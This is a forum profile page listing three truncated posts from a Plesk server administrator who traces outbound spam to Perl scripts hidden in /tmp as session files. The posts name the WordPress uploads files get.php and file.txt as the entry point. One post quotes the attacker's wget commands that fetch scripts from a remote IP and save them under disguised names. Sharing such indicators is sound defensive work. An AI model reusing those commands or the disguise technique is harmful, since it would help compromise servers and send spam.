Recent content by koandy1983

  1. Spam from hole in Plesk?

    Hello again! I've managed to catch the intruder. I bet that everyone that has this problem with /tmp/sess_652...... file has WordPress installed. Check the folder /wp-content/uploads for a file named get.php and file.txt. That's how they managed to send mail through our server. I have a bunch...
  2. Spam from hole in Plesk?

    I have blocked httpd user by cron.deny. The wget command is used to load the script. The parameters of wget are: xxtp://38.101.26.226/test2.sh -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4099 and xxtp://38.101.26.226/test2.jpg -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4092
  3. Spam from hole in Plesk?

    Hello, I have the exact situation. In /tmp I have managed to catch sess_f652da7dd28dce7baeeae54a46ae4092 and sess_f652da7dd28dce7baeeae54a46ae4099. sess_f652da7dd28dce7baeeae54a46ae4092 is a Perl script that is sending spam from my server and sess_f652da7dd28dce7baeeae54a46ae4099 has this...